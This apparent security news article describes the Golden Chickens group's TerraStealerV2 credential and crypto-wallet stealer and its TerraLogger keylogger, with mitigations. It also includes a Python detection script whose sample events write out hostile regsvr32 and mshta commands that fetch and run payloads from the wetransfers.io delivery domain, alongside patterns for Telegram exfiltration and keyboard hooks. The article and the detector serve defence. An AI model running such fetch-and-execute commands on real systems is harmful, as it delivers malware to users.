
Malware-Infected Golden Chickens Reemerge in 2025's Cybercriminal Onslaught, Equipped with Two Fresh Tools

Explore the methods utilized by the latest TerraStealerV2 malware to infiltrate your browser and digital wallets for cryptocurrencies. The question stands - is your sensitive data really secure?

Golden Chickens' Return: TerraStealerV2 and TerraLogger


Once again, infamous cybercriminal group Golden Chickens, also known as Venom Spider, has surfaced. Their latest toys, TerraStealerV2 malware and TerraLogger, are designed to steal sensitive data and log keystrokes, threatening user security like never before.

These new tools are part of the group's expanding malware-as-a-service (MaaS) offering and mark a calculated shift towards targeting browsers, crypto wallets, and user input. The pair is packaged in several file types, including EXEs, MSI installers, LNK shortcuts, and OLE Control Extensions (OCX), which makes them easy to distribute and harder to detect with format-specific signatures.

TerraStealerV2: Data Thief Extraordinaire

TerraStealerV2 is built to harvest sensitive information from browsers and cryptocurrency wallets. It collects stored browser credentials and saved logins and mines browser extension data, which can lead to crypto wallet theft when those extensions are used to manage or trade assets. The malware is typically delivered as an OCX payload from lookalike domains such as wetransfers[.io]. Once downloaded, it is executed through legitimate Windows utilities such as regsvr32.exe and mshta.exe, living-off-the-land binaries whose signed, trusted status helps the payload slip past security controls that only flag unknown executables.

Although it attempts to steal Chrome login data, it does not bypass the Application Bound Encryption (ABE) protections Chrome introduced in July 2024, which suggests either that the tool is still under active development or that its tactics are outdated. Stolen data is exfiltrated to Telegram channels and external servers, giving the operators near real-time access to whatever was collected.

TerraLogger: Constant Keystroke Companion

Unlike TerraStealerV2, TerraLogger takes a simpler but equally dangerous path. It is a standalone keylogger that quietly records every keystroke on the infected machine, from login credentials to personal conversations. TerraLogger does not currently exfiltrate data or contact command-and-control (C2) servers, but its design suggests it is meant to be integrated into broader campaigns. Golden Chickens may pair this keylogger with their other tools to build a multi-stage infection chain. Despite its simplicity, TerraLogger is a significant concern for browser security, especially when combined with a data-exfiltration tool like TerraStealerV2.

Catching the Golden Chickens: Infection Methods

Golden Chickens distribute their malware in multiple file types to make infection more likely. Popular delivery formats include EXEs, MSI, LNK, and OCX. This versatile approach raises the odds that an unsuspecting user opens one of the files and, in doing so, installs the malware. The use of well-known Windows utilities for execution and Telegram for data transfer adds a layer of concealment: the traffic blends in with legitimate activity, and the attacker can edit or delete the messages at will.

Impacts on Browser Security and Crypto Users

TerraStealerV2's emergence underscores the growing focus on browser-based attacks. As more users store credentials in browsers like Chrome or rely on browser extensions to manage cryptocurrencies, a single infection can open the door to financial platforms, crypto wallets, or even corporate intranets. The rising trend of crypto wallet theft through malware like TerraStealerV2 shows how cybercrime is evolving: data-stealing tools are becoming more customizable and harder to detect. Although both TerraStealerV2 and TerraLogger are still considered works in progress, their current capabilities already cause real harm. As Golden Chickens continue to refine these tools, we can expect more stealth, deeper system access, and broader targeting.

Ongoing Threat and Future Risks

The continued evolution of these tools shows that the group is still investing in new techniques. While TerraLogger is for now a simple keylogger, it may later operate alongside TerraStealerV2, the rest of the Golden Chickens toolkit, or within a broader multi-stage threat. With escalating reports of browser vulnerabilities and stolen crypto wallets, it is crucial to remain vigilant, scrutinize downloads, minimize the use of insecure software, and keep browsers up to date so that protections such as ABE are in place. Expect the TerraStealerV2 and TerraLogger story to keep changing.

Enrichment Data:

  • TerraStealerV2 uses multi-format attacks, primarily EXEs, DLLs, MSI, and LNK files, with an OCX payload retrieved from "wetransfers.io".
  • It evades security controls by abusing trusted utilities such as regsvr32.exe and mshta.exe, collects data, compresses it, and sends it to Telegram and "wetransfers.io".

Protect yourself by:

  1. Updating browsers: Ensure they have adequate Application Bound Encryption (ABE) protections in place.
  2. Blocking suspicious domains: Disallow traffic to "wetransfers.io" and associated infrastructure.
  3. Restricting script execution: Set policies that limit the misuse of regsvr32.exe and mshta.exe via application allowlisting.
  4. Monitoring for keyloggers: Use endpoint detection tools to spot keyboard hooks, like those employed by TerraLogger.
  5. Implementing multi-factor authentication (MFA): This mitigates the impact of stolen credentials.
  6. Regularly auditing wallet directories: Check for unauthorized access, modifications, or unusual activity.

For organizations, prioritize behavioral analysis over signature-based detection due to the use of living-off-the-land binaries (LOLBins).
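To make the behavioral-over-signature advice concrete, here is an added example (not code from the article or from any vendor) that triages endpoint telemetry for the behaviors this article describes: regsvr32.exe or mshta.exe launched with a remote URL or an OCX in a user-writable path, DNS or URL activity touching the wetransfers[.io] delivery domain or the Telegram API, and installation of a Win32 keyboard hook of the kind a keylogger such as TerraLogger relies on. The event schema (flat dicts with `event`, `image`, `command_line`, `query_name`, `api`, `hook_type`) is an assumption standing in for Sysmon or EDR records, the `api.telegram.org` host is an assumption about how Telegram exfiltration looks on the wire, and all sample events are constructed.

```python
"""Behavioral triage of constructed endpoint telemetry for Golden Chickens-style activity.

Added illustration, not the article's or any vendor's code. The event shape is an
assumption standing in for Sysmon process-creation / DNS events and EDR API telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

LOLBINS = {"regsvr32.exe", "mshta.exe"}             # utilities named in the article
DELIVERY_DOMAINS = {"wetransfers.io"}              # the article's wetransfers[.io], undefanged
EXFIL_DOMAINS = {"api.telegram.org"}               # assumption: Telegram Bot API endpoint
KEYBOARD_HOOKS = {"WH_KEYBOARD", "WH_KEYBOARD_LL"}  # Win32 hook types a user-mode keylogger installs

# Paths a normal user can write to; a legitimately registered OCX usually lives under Program Files.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\(AppData|Downloads)|ProgramData|Windows\\Temp)\\", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
OCX_PATH = re.compile(r"\S+\.ocx\b", re.I)


@dataclass
class Finding:
    rule: str
    process: str
    reason: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _hosts(ev: Dict) -> List[str]:
    """Hostnames the event touches: URLs on the command line plus DNS query names."""
    hosts = [h.lower() for h in URL_HOST.findall(ev.get("command_line", ""))]
    if ev.get("query_name"):
        hosts.append(ev["query_name"].lower())
    return hosts


def _in_domains(host: str, domains: set) -> bool:
    return any(host == d or host.endswith("." + d) for d in domains)


def rule_lolbin_payload(ev: Dict) -> List[Finding]:
    """regsvr32/mshta started with a remote URL, or loading an OCX from a user-writable path."""
    if ev.get("event") != "process_create" or _basename(ev.get("image", "")) not in LOLBINS:
        return []
    cmd = ev.get("command_line", "")
    reasons = []
    if URL_HOST.search(cmd):
        reasons.append("remote URL on command line")
    ocx = OCX_PATH.search(cmd)
    if ocx and USER_WRITABLE.search(ocx.group(0)):
        reasons.append("OCX loaded from user-writable path")
    return [Finding("lolbin_payload", ev["image"], "; ".join(reasons))] if reasons else []


def rule_known_domain(ev: Dict) -> List[Finding]:
    """Any event that touches the delivery domain or the Telegram exfiltration endpoint."""
    out = []
    for host in _hosts(ev):
        if _in_domains(host, DELIVERY_DOMAINS):
            out.append(Finding("delivery_domain", ev.get("image", "?"), host))
        elif _in_domains(host, EXFIL_DOMAINS):
            out.append(Finding("telegram_exfil", ev.get("image", "?"), host))
    return out


def rule_keyboard_hook(ev: Dict) -> List[Finding]:
    """SetWindowsHookEx with a keyboard hook type: the classic user-mode keylogger primitive."""
    if ev.get("event") != "api_call" or not ev.get("api", "").startswith("SetWindowsHookEx"):
        return []
    if ev.get("hook_type") not in KEYBOARD_HOOKS:
        return []
    return [Finding("keyboard_hook", ev["image"], f"{ev['api']}({ev['hook_type']})")]


RULES = (rule_lolbin_payload, rule_known_domain, rule_keyboard_hook)


def analyze(events: Iterable[Dict]) -> List[Finding]:
    """Run every behavioral rule over every event and collect the findings."""
    findings: List[Finding] = []
    for ev in events:
        for rule in RULES:
            findings.extend(rule(ev))
    return findings


# Constructed sample telemetry: two malicious LOLBin launches, one benign OCX registration,
# one Telegram DNS lookup, one keyboard hook, one harmless mouse hook.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s /i:https://wetransfers.io/x C:\Users\u\AppData\Local\Temp\a.ocx"},
    {"event": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe https://wetransfers.io/payload.hta"},
    {"event": "process_create", "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Program Files\Vendor\ctrl.ocx"},
    {"event": "dns_query", "image": r"C:\Users\u\AppData\Roaming\svc.exe", "query_name": "api.telegram.org"},
    {"event": "api_call", "image": r"C:\Users\u\AppData\Roaming\svc.exe",
     "api": "SetWindowsHookExW", "hook_type": "WH_KEYBOARD_LL"},
    {"event": "api_call", "image": r"C:\Program Files\Tool\tool.exe",
     "api": "SetWindowsHookExW", "hook_type": "WH_MOUSE"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.process}: {f.reason}")
```

The benign third event shows why the OCX check is paired with a path condition: regsvr32.exe registering a control under Program Files is routine, while the same binary pulling a scriptlet from a URL or loading an OCX out of AppData is the pattern described above. In a real deployment the rules would consume Sysmon Event ID 1 and 22 records or EDR API telemetry rather than the assumed dict shape, and the domain sets would come from a maintained blocklist.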

  1. The infamous cybercriminal group Golden Chickens, also known as Venom Spider, has introduced two new tools, TerraStealerV2 and TerraLogger, both designed to steal sensitive data and threaten user security.
  2. TerraStealerV2 is a data thief that targets browsers and crypto wallets, scanning for stored credentials, browsing for saved logins, and mining browser extension data.
  3. TerraLogger, on the other hand, functions as a keylogger, recording every keystroke on infected machines, potentially compromising login credentials and personal conversations.
  4. Golden Chickens uses multiple file types, such as EXEs, MSI, LNK, and OCX, to distribute their malware, increasing the chances of infection.
  5. To protect oneself, it is recommended to update browsers with Application Bound Encryption (ABE) protections, block suspicious domains like wetransfers[.io], restrict script execution, monitor for keyloggers, implement multi-factor authentication (MFA), and regularly audit wallet directories.
  6. TerraStealerV2 cannot currently swipe Chrome login data protected by the newer Application Bound Encryption (ABE) protocols introduced in Chrome in July 2024; what it does collect is exfiltrated to Telegram channels and external servers. The group is nonetheless expected to keep evolving its tools, increasing stealth, system penetration, and the range of targeted users.